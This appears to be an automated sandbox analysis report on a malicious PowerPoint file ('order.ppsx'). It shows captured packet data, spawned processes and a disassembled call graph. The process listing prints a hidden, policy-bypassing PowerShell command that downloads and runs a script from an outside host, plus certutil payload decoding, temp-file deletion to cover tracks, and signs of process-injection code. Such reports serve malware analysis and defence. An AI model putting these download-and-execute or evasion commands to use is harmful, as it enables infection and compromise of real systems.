Mai 28, 2017 17:18:55.620583057 MESZ804923446.21.169.110192.168.1.16Data Raw: 7f 46 66 7b 45 09 4e 2b 36 6b 09 6e 4e 70 2f 43 33 62 25 35 3b 62 6d 33 32 54 27 21 78 4e 7f 57 72 78 7f 4e 70 2f 43 33 72 30 44 6b 68 2b 6c 71 27 21 78 5b 6e 36 6b 78 6e 5b 70 2f 43 33 62 30 34 57 3b 4d 26 2b 27 45 09 4e 7f 57 6b 09 2b 5b 69 6b
Data Ascii: Ff{EN+6knNp/C3b%5;bm32T'!xNWrxNp/C3r0Dkh+lq'!x[n6kxn[p/C3b04W;M&+'ENWk+[iklVrRVlDO+MG%{;UN0bxnNIdm3r%D;DkULyc';U9+Wkn9idm3b%/DDKUol!xENnWbx+9I/m3kRhGD 2';x[n6kU+9I/m3r04+k.dtlzv2x!x[0bx+9ikC3b%Otx+q{Ex9n0bx+9Idl0kRw.kU^/**{;x9+
2
Mai 28, 2017 17:18:55.620608091 MESZ804923446.21.169.110192.168.1.16Data Raw: 4f 62 57 78 63 43 28 2b 2e 59 42 22 42 78 53 73 23 50 44 2b 44 45 4d 55 50 55 59 2e 6b 09 6f 2c 45 36 44 57 73 2f 74 6d 44 4a 33 45 2f 57 72 5f 72 4a 51 4a 5b 6e 72 54 63 60 33 76 63 46 42 62 51 6c 23 38 53 7a 7f 6c 2a 29 45 71 79 2a 76 29 24 45
Data Ascii: ObWxcC(+.YB"BxSs#PD+DEMUPUY.ko,E6DWs/tmDJ3E/Wr_rJQJ[nrTc`3vcFBbQl#8Szl*)Eqy*v)$EN+WlED`6EUmDkGUv#MnY!Dx,O.Ei)~T~TS8#QkAGm)W;mYrG`C4.D~"BxB:#PDOEMx~?DDrUT$J6.WsZtm.E_rZKJQJEQrNnJYc`3B*0E#_Xb)~AlMdFvlEFy!B)$EdhFlvTv0;U1YkKU`*DO;DPDD;
4
Mai 28, 2017 17:18:55.620879889 MESZ804923446.21.169.110192.168.1.16Data Raw: 49 4e 42 21 53 21 42 71 23 33 09 4f 34 57 6c 29 57 3b 09 6d 4f 6b 4b 55 76 6c 38 7f 44 44 7e 79 42 78 42 68 23 50 44 6e 59 21 44 55 7e 55 59 44 62 55 6f 5d 4a 30 4d 47 68 5a 34 6c 4d 4a 51 4a 2f 47 72 5f 45 4a 33 45 4e 7f 4a 44 63 76 5f 42 58 71
Data Ascii: INB!S!Bq#3O4Wl)W;mOkKUvl8DD~yBxBh#PDnY!DU~UYDbUo]J0MGhZ4lMJQJ/Gr_EJ3ENJDcv_BXqE#Q**NB/4mVR)BO,EN$EY4cmBDc6Ex1OkKx`*`.+DEMx~Y.;iN~ZS!BFbQPh+.nlll0!U1YrKxvl4DDSyBxS:*.nDED~?DDkL,J6DK:/tC.r_EZKE_rJQE9+JDcv_v,lv*_X*8BhkR)E1%E8,BS+.nllBYc0
5
Mai 28, 2017 17:18:55.658356905 MESZ804923446.21.169.110192.168.1.16Data Raw: 44 7e 22 7e 09 53 3a 2a 09 2e 6e 44 45 44 55 7e 55 59 2e 6b 09 4c 5d 4a 57 4d 57 73 5a 74 6d 44 72 51 4a 3b 57 45 5f 72 4a 51 45 39 2b 4a 59 63 60 33 42 63 46 76 62 5f 6c 23 29 7e 4f 74 47 58 3d 42 31 47 45 4e 24 45 3b 3b 72 4f 6c 42 44 63 36 45
Data Ascii: D~"~S:*.nDEDU~UY.kL]JWMWsZtmDrQJ;WE_rJQE9+JYc`3BcFvb_l#)~OtGX=B1GEN$E;;rOlBDc6EUmDrKxc*M+Y!D~YMEni)~TSZ~F*Q1tlMr0l=0!x^YrG`C4.YBySUB:#`.Y;D~UY.bxT$J6DKhZ4l.J3J/Gr_JrQJ9+JYcc_Ec+Bb_Xb)~LkOlB8Fv)$B^4mDr%mvY`W!x1YkKxvbM+OEMx~OME+pN~Z~
6
Mai 28, 2017 17:18:55.658390045 MESZ804923446.21.169.110192.168.1.16Data Raw: 2c 77 3b 21 5a 2a 46 2d 3b 21 54 58 32 2d 3b 21 5a 58 26 27 45 54 54 6c 26 2d 3b 54 5a 26 71 2d 21 54 5a 26 2b 7b 59 34 6b 2f 5d 09 6b 3b 44 57 6c 6c 30 21 78 5e 4f 62 57 78 76 43 34 7f 44 59 42 22 53 78 42 3a 2a 09 2e 2b 4f 3b 4d 78 7e 3f 44 2e
Data Ascii: ,w;!Z*F-;!TX2-;!ZX&'ETTl&-;TZ&q-!TZ&+{Y4k/]k;DWll0!x^ObWxvC4DYB"SxB:*.+O;Mx~?D.ko,E6DWh/4l.J3E;WE3Jr_J9+rD`v_v%yBbQl#8B.k1tv=vq!OB)$v/;.WlvTvWEmOrKx`b`M+OEMU,Y.!+p8~Z~ZSF*_`t!x1C=0E^YbWxvC8+MYBySxSh*.+D;DPjOMkxL,r0.Ws/4l.r_rZWr_rE_rNnJ
8
Mai 28, 2017 17:18:55.658648014 MESZ804923446.21.169.110192.168.1.16Data Raw: 78 4c 2c 72 30 44 4b 68 5a 34 6c 44 72 51 45 5a 4b 4a 33 4a 45 5f 45 5b 7f 4a 44 60 76 51 42 38 21 2a 76 2a 5f 2a 62 4e 42 57 6e 44 57 2a 57 29 76 4f 2a 45 38 24 45 56 4b 2d 2b 6c 6c 76 54 76 30 3b 55 31 59 6b 4b 55 60 2a 09 44 7f 4f 3b 44 09 50
Data Ascii: xL,r0DKhZ4lDrQEZKJ3JE_E[JD`vQB8!*v*_*bNBWnDW*W)vO*E8$EVK-+llvTv0;U1YkKU`*DO;DPDD;+INB!S!Bq#3WrN%{C=0;x1ObWUvl(+DD~.SxB:bM+O;MxPUODbxo]EWDK:;tCDEQrZGJ3EJ3J[nrT`cQE,B*Ql#NBEaVWW)Eq!8BN$E0rU9%GmvTv0E^OkKxv#`DnO!DUPD.EiNSZ~!Sq*_`trlll6E
9
Mai 28, 2017 17:18:55.691008091 MESZ804923446.21.169.110192.168.1.16Data Raw: 76 60 33 76 46 38 46 76 23 33 2a 62 4e 42 44 2b 73 43 6b 6c 29 42 38 71 31 42 29 24 45 3a 6e 3f 47 71 6c 6c 76 54 76 57 45 09 6d 4f 72 4b 78 60 62 60 4d 2b 4f 45 4d 55 2c 59 2e 21 2b 70 38 7e 5a 7e 5a 53 46 2a 5f 60 59 34 6c 4f 7b 6d 29 30 21 55
Data Ascii: v`3vF8Fv#3*bNBD+sCkl)B8q1B)$E:n?GqllvTvWEmOrKx`b`M+OEMU,Y.!+p8~Z~ZSF*_`Y4lO{m)0!UmDkWcC4DD~"~USs#`DOEMx~jDDkUL]JWDKh;tCMJ3JZKJ3EJ3J[+rTcc3BFZB*_**NSVmYD+{)vqycv8]vY4lO{mBTcW!x^YbG`bPDYEMx,OD!+I8B!STBF#3`0b,l=W;x1YbWU`C8DO~.SxB:b`M+Y;.
10
Mai 28, 2017 17:18:55.691301107 MESZ804923446.21.169.110192.168.1.16Data Raw: 3b 44 09 7e 55 59 2e 62 78 54 24 4a 36 44 4b 68 5a 34 6c 2e 4a 33 4a 2f 47 72 5f 4a 72 51 4a 39 2b 4a 59 63 63 5f 45 46 38 46 76 23 51 58 2a 38 53 59 34 72 76 3d 42 71 71 6c 42 38 2c 76 6b 59 72 25 6d 76 59 60 57 21 78 31 59 6b 4b 78 76 62 09 4d
Data Ascii: ;D~UY.bxT$J6DKhZ4l.J3J/Gr_JrQJ9+JYcc_EF8Fv#QX*8SY4rv=BqqlB8,vkYr%mvY`W!x1YkKxvbM+OEMx~OME+pN~Z~!BqbTp\mD~/CVb%4+b./tlz2'Y4rk$`mm.Oll6EmYbWcl(+.YBySUB:#P.+DED~jYMko,JW.K:/tm.J3J/Gr_JEQrNnJYcv_v+!E#_l#)S+7D{)EFq1E8$E^lM,lEDc0!x1YrWUc*.+D
11
Mai 28, 2017 17:18:55.694314957 MESZ804923446.21.169.110192.168.1.16Data Raw: 45 38 2c 42 31 47 4f 6c 76 59 60 36 45 78 31 59 62 47 78 76 23 60 44 7f 59 3b 2e 09 50 59 4d 3b 2b 70 38 7e 5a 53 54 7e 38 23 33 09 73 6b 31 43 3d 30 3b 78 31 4f 6b 4b 78 63 43 28 2b 44 4f 53 2e 7e 55 7e 73 62 50 44 6e 44 45 4d 78 50 55 59 4d 72
Data Ascii: E8,B1GOlvY`6Ex1YbGxv#`DY;.PYM;+p8~ZST~8#3sk1C=0;x1OkKxcC(+DOS.~U~sbPDnDEMxPUYMrxT$E0MWh/4lDrQJ;WJ3EE_rNJD`cQE%fB*Q**8S8!kVO*=BqFlv)$v^kOlBY`6;x1YrW`b`M+Y!.x,YD!nI8B!B!SFbQPDnGml0!x^ObWxcC(+.YB"BxSs#PD+DEMUPUY.ko,E6DWs/tmDJ3E/Wr_rJQJ[nrTc
12
Mai 28, 2017 17:18:55.701215982 MESZ804923446.21.169.110192.168.1.16Data Raw: 44 72 57 09 60 62 60 4d 2b 59 3b 2e 09 50 4f 44 21 6e 70 38 53 5a 7e 5a 7e 46 2a 5f 50 41 74 62 2a 43 29 36 45 55 5e 44 6b 57 09 63 6c 28 2b 44 44 53 22 7e 09 7e 73 23 60 44 6e 4f 21 44 55 50 55 4f 44 62 78 4c 2c 72 30 44 47 68 3b 74 43 44 72 51
Data Ascii: DrW`b`M+Y;.POD!np8SZ~Z~F*_PAtb*C)6EU^DkWcl(+DDS"~~s#`DnO!DUPUODbxL,r0DGh;tCDrQrZGr_rJ_rNETv`QBO vb3*#)SwM+%=vq 8B)$vh4rllvTvWEmOrKx`b`M+OEMU,Y.!+p8~Z~ZSF*_`/4ls*m)0!UmDkWcC4DD~"~USs#`DOEMx~jDDkUL]JWDKh;tCMJ3JZKJ3EJ3J[+rTcc3BF8qB*_**NS
14

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

General

Start time:17:18:08
Start date:28/05/2017
Path:C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE
Wow64 process (32bit):false
Commandline:'C:\Program Files\Microsoft Office\Office14\powerpnt.exe' /s 'C:\order.ppsx'
Imagebase:0x2d560000
File size:2162024 bytes
MD5 hash:E24133DD836D99182A6227DCF6613D08
Programmed in:C, C++ or other language

General

Start time:17:19:10
Start date:28/05/2017
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -NonI -W Hidden -Exec Bypass 'IEX (New-Object System.Net.WebClient).DownloadFile('http:'+[char] 0x2F+[char] 0x2F+'cccn.nl'+[char] 0x2F+'c.php',\'$env:temp\ii.jse\'); Invoke-Item \'$env:temp\ii.jse\''
Imagebase:0x22640000
File size:452608 bytes
MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
Programmed in:.Net C# or VB.NET

General

Start time:17:19:15
Start date:28/05/2017
Path:C:\Windows\System32\wscript.exe
Wow64 process (32bit):false
Commandline:'C:\Windows\System32\WScript.exe' 'C:\Users\LUKETA~1\AppData\Local\Temp\ii.jse'
Imagebase:0x76e20000
File size:141824 bytes
MD5 hash:979D74799EA6C8B8167869A68DF5204A
Programmed in:C, C++ or other language

General

Start time:17:20:18
Start date:28/05/2017
Path:C:\Windows\System32\certutil.exe
Wow64 process (32bit):false
Commandline:'C:\Windows\System32\certutil.exe' -decode C:\Users\LUKETA~1\AppData\Local\Temp\168.gop C:\Users\LUKETA~1\AppData\Local\Temp\484.exe
Imagebase:0xd90000
File size:903168 bytes
MD5 hash:0D52559AEF4AA5EAC82F530617032283
Programmed in:C, C++ or other language

General

Start time:17:20:38
Start date:28/05/2017
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:'C:\Windows\System32\cmd.exe' /c start C:\Users\LUKETA~1\AppData\Local\Temp\484.exe
Imagebase:0x4a8f0000
File size:302592 bytes
MD5 hash:AD7B9C14083B52BC532FBA5948342B98
Programmed in:C, C++ or other language

General

Start time:17:20:38
Start date:28/05/2017
Path:C:\Users\LUKETA~1\AppData\Local\Temp\484.exe
Wow64 process (32bit):false
Commandline:C:\Users\LUKETA~1\AppData\Local\Temp\484.exe
Imagebase:0x400000
File size:237568 bytes
MD5 hash:13CDBD8C31155610B628423DC2720419
Programmed in:C, C++ or other language

General

Start time:17:20:48
Start date:28/05/2017
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:'C:\Windows\System32\cmd.exe' /U /Q /C del /Q/F %TEMP%\*.exe && del /Q/F %TEMP%\*.gop && del /Q/F %TEMP%\*.txt && del /Q/F %TEMP%\*.log && del /Q/F %TEMP%\*.jse
Imagebase:0x76e20000
File size:302592 bytes
MD5 hash:AD7B9C14083B52BC532FBA5948342B98
Programmed in:C, C++ or other language

General

Start time:17:21:10
Start date:28/05/2017
Path:C:\Windows\System32\mstsc.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\mstsc.exe 'C:\Users\LUKETA~1\AppData\Local\Temp\484.exe'
Imagebase:0xdd0000
File size:1068544 bytes
MD5 hash:4676AAA9DDF52A50C829FEDB4EA81E54
Programmed in:C, C++ or other language

Disassembly

Code Analysis

Reset < >

    Execution Graph

    Execution Coverage:3.5%
    Dynamic/Decrypted Code Coverage:3.8%
    Signature Coverage:26.6%
    Total number of Nodes:1615
    Total number of Limit Nodes:27

    Graph

    %3 14396 423cda 14402 421770 14396->14402 14398 423ce4 RtlDecodePointer 14399 423cf4 14398->14399 14400 423c8c __CxxUnhandledExceptionFilter 40 API calls 14399->14400 14401 423d0f 14400->14401 14402->14398 11376 1706a0 RegQueryValueExA 11379 1706b0 11376->11379 11377 1706e1 RegCloseKey 11378 1706ed 11377->11378 11379->11377 11379->11378 11833 1701de 11834 1701e3 11833->11834 11836 170000 11833->11836 11838 170010 11836->11838 11859 1702b2 11838->11859 11840 17001a 11841 170022 GetModuleHandleExW 11840->11841 11842 1701cf RtlExitUserThread 11840->11842 11841->11842 11843 17003b 11841->11843 11880 1707e2 11843->11880 11846 170048 VirtualAlloc 11846->11842 11847 170069 11846->11847 11847->11847 11848 1700a3 VirtualAlloc 11847->11848 11848->11842 11849 1700c0 11848->11849 11850 1700ce VirtualFree VirtualProtect 11849->11850 11850->11842 11851 17010c 11850->11851 11852 17012a VirtualProtect 11851->11852 11852->11842 11853 170147 11852->11853 11854 170173 VirtualFree 11853->11854 11855 170199 11854->11855 11856 1701c4 11855->11856 11886 17020e 11855->11886 11856->11842 11891 40efb9 SetErrorMode SetErrorMode GetProcessHeap HeapAlloc 11856->11891 11937 1704c1 GetPEB 11859->11937 11861 1702bd 11862 1702c6 GetProcAddress LoadLibraryA 11861->11862 11863 1701cf RtlExitUserThread 11862->11863 11864 1702f7 LoadLibraryA 11862->11864 11863->11840 11864->11863 11865 17030f GetProcAddress 11864->11865 11865->11863 11866 17032a GetProcAddress 11865->11866 11866->11863 11867 170348 GetProcAddress 11866->11867 11867->11863 11868 170366 GetProcAddress 11867->11868 11868->11863 11869 170384 GetProcAddress 11868->11869 11869->11863 11870 1703a2 GetProcAddress 11869->11870 11870->11863 11871 1703c0 GetProcAddress 11870->11871 11871->11863 11872 1703de GetProcAddress 11871->11872 11872->11863 11873 1703fc GetProcAddress 11872->11873 11873->11863 11874 17041a GetProcAddress 11873->11874 11874->11863 11875 170438 GetProcAddress 11874->11875 11875->11863 11876 170456 GetProcAddress 11875->11876 11876->11863 11877 170474 GetProcAddress 11876->11877 11877->11863 11878 170492 GetProcAddress 11877->11878 11878->11863 11879 1704b0 11878->11879 11879->11840 11881 1707ea 11880->11881 11885 170040 11881->11885 11939 1706f6 GetSystemWindowsDirectoryA 11881->11939 11885->11842 11885->11846 11887 17028e 11886->11887 11889 17021d 11886->11889 11887->11856 11888 17022a LoadLibraryA 11888->11889 11889->11887 11889->11888 11890 170265 GetProcAddress 11889->11890 11890->11889 11892 40f024 GetCapture 11891->11892 11893 40f031 11892->11893 11893->11892 11894 40f049 GetProcessHeap HeapAlloc 11893->11894 11895 40f09f GetFocus 11894->11895 11896 40f0ac 11895->11896 11896->11895 11897 40f0c4 LoadLibraryA GetProcAddress GetCommandLineW 11896->11897 11898 40f0e8 GetProcessHeap HeapAlloc GetModuleFileNameW GetProcessHeap RtlAllocateHeap 11897->11898 11899 40f17b IsSystemResumeAutomatic 11898->11899 11900 40f188 11899->11900 11900->11899 11901 40f1a0 GetProcessHeap 11900->11901 11902 40f1cf 11901->11902 11903 40f1b5 GetModuleHandleW 11901->11903 11970 40ef8b VirtualQuery 11902->11970 11945 409c2e GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 11903->11945 11907 40f1c7 ExitProcess 11908 40f1e8 11971 401c80 11908->11971 11913 40f21f GetProcessHeap HeapAlloc 11916 40f2eb GetActiveWindow 11913->11916 11914 40f20c 11991 40a0ee GetProcessHeap HeapAlloc 11914->11991 11918 40f2f8 11916->11918 11917 40f211 GetProcessHeap HeapFree 11917->11907 11918->11916 11919 40f310 GetProcessHeap HeapAlloc 11918->11919 11920 40f38b GetModuleHandleW 11919->11920 11921 40f39a 11920->11921 11921->11920 11922 40f3b2 6 API calls 11921->11922 12012 40be1a GetProcessHeap HeapAlloc 11922->12012 11924 40f417 11925 40f43d StrStrIW 11924->11925 12019 40b71e 11924->12019 11926 40f469 11925->11926 11927 40f453 StrStrIW 11925->11927 12078 40ee9b GetProcessHeap HeapAlloc 11926->12078 11927->11926 11936 40f429 11927->11936 11932 40f46e 6 API calls 11934 40f49f Sleep 11932->11934 12660 40c737 11932->12660 11934->11934 11936->11925 12026 40890f lstrlenW 11936->12026 12047 4019c7 11936->12047 11938 1704d8 11937->11938 11938->11861 11940 17071c GetVolumeInformationA 11939->11940 11941 170744 11939->11941 11940->11941 11941->11885 11942 17075a GetUserNameA 11941->11942 11943 170786 CharUpperBuffA 11942->11943 11944 17079f 11942->11944 11943->11944 11944->11885 11946 409d43 GetProcessHeap 11945->11946 11947 409d50 11946->11947 11947->11946 11948 409d69 ExpandEnvironmentStringsW lstrcatW lstrcatW lstrcatW lstrcatW 11947->11948 11949 409db0 CreateProcessW 11948->11949 11950 409da5 Sleep 11949->11950 11951 409dd1 GetProcessHeap HeapFree GetThreadContext 11949->11951 11950->11949 11952 40a0af TerminateProcess CloseHandle CloseHandle 11951->11952 11953 409e13 11951->11953 11955 40a0cf GetProcessHeap HeapFree 11952->11955 12084 40f995 GetProcessHeap HeapAlloc 11953->12084 11955->11907 11956 409e2a 11966 40a084 11956->11966 12098 40f6f4 GetProcessHeap HeapAlloc 11956->12098 11958 40a097 11961 40a09e CloseHandle 11958->11961 11962 40a0a8 11958->11962 11959 40a090 12107 40f859 GetProcessHeap HeapAlloc 11959->12107 11961->11962 11962->11952 11962->11955 11963 409e45 11963->11958 11964 409fc7 SetLastError ReadProcessMemory 11963->11964 11963->11966 11965 40a002 IsBadReadPtr IsBadReadPtr 11964->11965 11964->11966 11967 40a03e 11965->11967 11966->11958 11966->11959 11968 40a056 WriteProcessMemory 11967->11968 11969 40a07a ResumeThread 11967->11969 11968->11967 11968->11969 11969->11966 11970->11908 11972 401c9e GetCurrentProcess 11971->11972 11973 401ca5 11971->11973 11978 40e897 OpenProcessToken 11972->11978 11973->11972 11974 401cc0 LoadLibraryA 11973->11974 12125 401c18 11973->12125 11974->11972 11975 401ccd GetModuleFileNameA 11974->11975 11975->11973 11976 401ceb GetModuleHandleExA 11975->11976 11976->11973 11979 40e960 GetVersion 11978->11979 11980 40e8b4 GetTokenInformation 11978->11980 11979->11913 11979->11914 11981 40e954 CloseHandle 11980->11981 11982 40e8d0 GetLastError 11980->11982 11981->11979 11982->11981 11983 40e8db GetProcessHeap HeapAlloc 11982->11983 11984 40e953 11983->11984 11985 40e8f4 GetTokenInformation 11983->11985 11984->11981 11986 40e944 GetProcessHeap HeapFree 11985->11986 11987 40e90b GetSidSubAuthorityCount 11985->11987 11986->11984 11987->11986 11988 40e917 11987->11988 11988->11986 11989 40e91d GetSidSubAuthority 11988->11989 11989->11986 11990 40e92e 11989->11990 11990->11986 11992 40a1c2 ReleaseCapture 11991->11992 11993 40a1cf 11992->11993 11993->11992 11994 40a1e7 ExpandEnvironmentStringsW GetShortPathNameW GetProcessHeap HeapAlloc 11993->11994 11995 40a272 GetForegroundWindow 11994->11995 11996 40a27f 11995->11996 11996->11995 11997 40a297 wsprintfW GetProcessHeap HeapAlloc 11996->11997 11998 40a300 RevertToSelf 11997->11998 11999 40a30d 11998->11999 11999->11998 12000 40a325 CoInitializeEx GetProcessHeap HeapAlloc 11999->12000 12001 40a3ac GetCapture 12000->12001 12002 40a3b9 12001->12002 12002->12001 12003 40a3d1 GetProcessHeap HeapAlloc 12002->12003 12004 40a422 GetDoubleClickTime 12003->12004 12005 40a42f 12004->12005 12005->12004 12006 40a447 LoadLibraryA GetProcAddress 12005->12006 12007 40a472 GetForegroundWindow 12006->12007 12008 40a487 12007->12008 12009 40a45d GetLastError 12008->12009 12010 40a48b 12 API calls 12008->12010 12009->12010 12011 40a46a Sleep 12009->12011 12010->11917 12011->12007 12013 40be7c GetFocus 12012->12013 12014 40be89 12013->12014 12014->12013 12015 40bea8 GetEnvironmentVariableA 12014->12015 12016 40bee7 GetProcessHeap HeapFree 12015->12016 12017 40bec2 lstrlenA 12015->12017 12016->11924 12018 40bedc 12017->12018 12018->12016 12021 40b89a 12019->12021 12022 40b8c0 12021->12022 12129 40e0ef 12021->12129 12022->11936 12023 40b8ca PathFindFileNameW 12022->12023 12024 40e60d 11 API calls 12023->12024 12025 40b8eb 12024->12025 12025->11936 12025->12025 12027 408ba8 12026->12027 12028 408932 GetProcessHeap HeapAlloc 12026->12028 12027->11936 12028->12027 12029 408957 GetProcessHeap HeapAlloc 12028->12029 12030 408977 lstrcpyW 12029->12030 12031 408b9c GetProcessHeap HeapFree 12029->12031 12175 404132 12030->12175 12031->12027 12034 4089d2 GetClipboardOwner 12035 4089df 12034->12035 12035->12034 12036 4089fe GetTickCount wsprintfW wsprintfW GetProcessHeap HeapAlloc 12035->12036 12037 408a47 GetTickCount GetProcessHeap HeapAlloc 12036->12037 12038 408b7f GetProcessHeap HeapFree GetProcessHeap HeapFree 12036->12038 12039 408af7 GetClipboardSequenceNumber 12037->12039 12038->12031 12040 408b04 12039->12040 12040->12039 12041 408b23 wsprintfA 12040->12041 12177 40dd0b 12041->12177 12044 408b5b GetProcessHeap HeapFree GetProcessHeap HeapFree 12044->12038 12046 408b58 12046->12044 12220 404521 GetModuleHandleW GetCurrentProcess OpenProcessToken 12047->12220 12050 40be1a 7 API calls 12052 4019ff 12050->12052 12051 401a0d 12056 401a0f Sleep 12051->12056 12057 401a23 GetModuleHandleW 12051->12057 12386 40b6b4 12051->12386 12052->12051 12234 40c055 GetProcessHeap HeapAlloc 12052->12234 12055 401a08 12264 40a98b 12055->12264 12056->12051 12390 40e6ed GetModuleHandleW GetVersion GetCurrentProcessId 12057->12390 12062 401a74 VirtualProtect 12454 40474a 12062->12454 12065 401a39 12065->12062 12434 40bf00 12065->12434 12068 401aaf 12069 40fcd2 13 API calls 12068->12069 12070 401ab9 GlobalAddAtomW AddAtomW 12069->12070 12465 40d9f1 12070->12465 12073 401b08 12073->11936 12079 40ef23 GetForegroundWindow 12078->12079 12080 40ef30 12079->12080 12080->12079 12081 40ef4f OpenMutexW 12080->12081 12082 40ef68 CreateMutexW GetProcessHeap HeapFree 12081->12082 12083 40ef83 ExitProcess 12081->12083 12082->11932 12085 40fa08 GetShellWindow 12084->12085 12086 40fa15 12085->12086 12086->12085 12087 40fa34 GetProcessHeap HeapAlloc 12086->12087 12088 40fa7e GetCapture 12087->12088 12089 40fa8b 12088->12089 12089->12088 12090 40faaa GetModuleHandleA GetProcAddress NtCreateSection 12089->12090 12091 40faf8 12090->12091 12092 40fb35 12090->12092 12094 40f6f4 25 API calls 12091->12094 12117 40f4a9 GetProcessHeap HeapAlloc 12092->12117 12095 40fb07 12094->12095 12096 40fb50 GetProcessHeap HeapFree GetProcessHeap HeapFree 12095->12096 12097 40fb49 CloseHandle 12095->12097 12096->11956 12097->12096 12099 40f766 GetClipboardSequenceNumber 12098->12099 12100 40f773 12099->12100 12100->12099 12101 40f795 GetProcessHeap HeapAlloc 12100->12101 12102 40f7cf GetShellWindow 12101->12102 12103 40f7dc 12102->12103 12103->12102 12104 40f7fb GetModuleHandleA GetProcAddress NtMapViewOfSection 12103->12104 12105 40f4a9 12 API calls 12104->12105 12106 40f830 GetProcessHeap HeapFree GetProcessHeap HeapFree 12105->12106 12106->11963 12108 40f8a1 GetShellWindow 12107->12108 12109 40f8ae 12108->12109 12109->12108 12110 40f8cd GetProcessHeap HeapAlloc 12109->12110 12111 40f920 CloseClipboard 12110->12111 12112 40f92d 12111->12112 12112->12111 12113 40f94c LoadLibraryA GetProcAddress 12112->12113 12114 40f965 12113->12114 12115 40f4a9 12 API calls 12114->12115 12116 40f96c GetProcessHeap HeapFree GetProcessHeap HeapFree 12115->12116 12116->11958 12118 40f4fd GetShellWindow 12117->12118 12119 40f50a 12118->12119 12119->12118 12120 40f525 GetProcessHeap HeapAlloc 12119->12120 12121 40f574 GetInputState 12120->12121 12122 40f581 12121->12122 12122->12121 12123 40f599 GetModuleHandleA GetProcAddress 12122->12123 12124 40f5b0 GetProcessHeap HeapFree GetProcessHeap HeapFree 12123->12124 12124->12095 12126 401c28 12125->12126 12127 401c2e 12126->12127 12128 401c61 GetProcAddress 12126->12128 12127->11973 12128->12126 12128->12127 12130 40e117 GetProcessHeap HeapAlloc 12129->12130 12133 40e236 12129->12133 12131 40e155 GetShellWindow 12130->12131 12132 40e162 12131->12132 12132->12131 12134 40e17a GetProcessHeap HeapAlloc 12132->12134 12135 40e2e7 12133->12135 12136 40e24d VirtualAlloc 12133->12136 12137 40e1d4 ReleaseCapture 12134->12137 12135->12021 12136->12135 12143 40e270 12136->12143 12138 40e1e1 12137->12138 12138->12137 12139 40e1f9 6 API calls 12138->12139 12139->12133 12140 40e280 VirtualFree 12140->12135 12143->12140 12145 4074d8 12143->12145 12158 40e60d 12143->12158 12146 4074f5 GetProcessHeap HeapAlloc 12145->12146 12157 40761f 12145->12157 12147 407544 GetMessageTime 12146->12147 12151 407551 12147->12151 12148 407653 12148->12143 12149 407626 OpenProcess 12149->12148 12150 40763a CloseHandle 12149->12150 12150->12148 12151->12147 12152 407570 GetProcessHeap HeapAlloc 12151->12152 12154 4075b5 IsSystemResumeAutomatic 12152->12154 12155 4075c2 12154->12155 12155->12154 12156 4075e1 6 API calls 12155->12156 12156->12148 12156->12157 12157->12148 12157->12149 12159 40e61f 12158->12159 12160 40e67a 12158->12160 12161 40e62d GetProcessHeap HeapAlloc 12159->12161 12162 40e624 lstrlenW 12159->12162 12160->12143 12161->12160 12163 40e647 WideCharToMultiByte 12161->12163 12162->12161 12163->12160 12164 40e65e 12163->12164 12167 40e545 12164->12167 12168 40e559 12167->12168 12172 40e5f6 GetProcessHeap HeapFree 12167->12172 12169 40e55e lstrlenA 12168->12169 12171 40e565 GetProcessHeap HeapAlloc 12168->12171 12169->12171 12171->12172 12173 40e5a1 12171->12173 12172->12160 12174 40e5e2 GetProcessHeap HeapFree 12173->12174 12174->12172 12176 404135 GetProcessHeap HeapAlloc 12175->12176 12176->12034 12201 40d97f 12177->12201 12180 40dd4e 12207 40dad5 6 API calls 12180->12207 12181 40dd44 GetLastError 12183 40dda2 12181->12183 12185 40dda6 GetProcessHeap HeapFree 12183->12185 12186 408b41 12183->12186 12184 40dd5d WriteFile 12187 40dd80 GetLastError 12184->12187 12188 40dd75 SetEndOfFile 12184->12188 12185->12186 12186->12044 12190 408761 GetProcessHeap HeapAlloc 12186->12190 12189 40dd88 SetFileTime CloseHandle 12187->12189 12188->12189 12189->12183 12191 4087b8 GetTickCount 12190->12191 12192 4087c5 12191->12192 12192->12191 12193 4087e0 GetProcessHeap HeapAlloc 12192->12193 12194 408819 GetCapture 12193->12194 12195 408826 12194->12195 12195->12194 12196 40883e GetProcessHeap HeapAlloc 12195->12196 12197 408885 GetCursor 12196->12197 12198 408892 12197->12198 12198->12197 12199 4088b1 LoadLibraryA GetProcAddress 12198->12199 12200 4088d3 6 API calls 12199->12200 12200->12046 12202 40d98e ExpandEnvironmentStringsW 12201->12202 12203 40d9e9 CreateFileW 12201->12203 12202->12203 12204 40d99e GetProcessHeap HeapAlloc 12202->12204 12203->12180 12203->12181 12204->12203 12205 40d9be ExpandEnvironmentStringsW 12204->12205 12205->12203 12206 40d9d8 GetProcessHeap HeapFree 12205->12206 12206->12203 12208 40dc47 ReleaseCapture 12207->12208 12209 40dc54 12208->12209 12209->12208 12210 40dc73 12209->12210 12211 40d97f 6 API calls 12210->12211 12212 40dc7a 12211->12212 12213 40dc80 CreateFileW 12212->12213 12214 40dcf2 GetProcessHeap HeapFree 12212->12214 12215 40dce2 GetProcessHeap HeapFree 12213->12215 12216 40dc9b 12213->12216 12214->12184 12215->12214 12216->12215 12217 40dca0 GetFileTime 12216->12217 12218 40dcb4 SystemTimeToFileTime SystemTimeToFileTime SystemTimeToFileTime 12217->12218 12219 40dcdb CloseHandle 12217->12219 12218->12219 12219->12215 12221 4019f5 12220->12221 12222 40455b GetTokenInformation GetLastError 12220->12222 12221->12050 12223 404581 GlobalAlloc 12222->12223 12224 40467c CloseHandle 12222->12224 12225 40459a GetTokenInformation 12223->12225 12226 40467b 12223->12226 12224->12221 12227 404674 GlobalFree 12225->12227 12228 4045b1 ConvertSidToStringSidW 12225->12228 12226->12224 12227->12226 12228->12227 12229 4045c5 12228->12229 12229->12227 12230 4045ce GetProcessHeap HeapAlloc 12229->12230 12231 404617 GetCapture 12230->12231 12232 404624 12231->12232 12232->12231 12233 404643 StrCmpIW 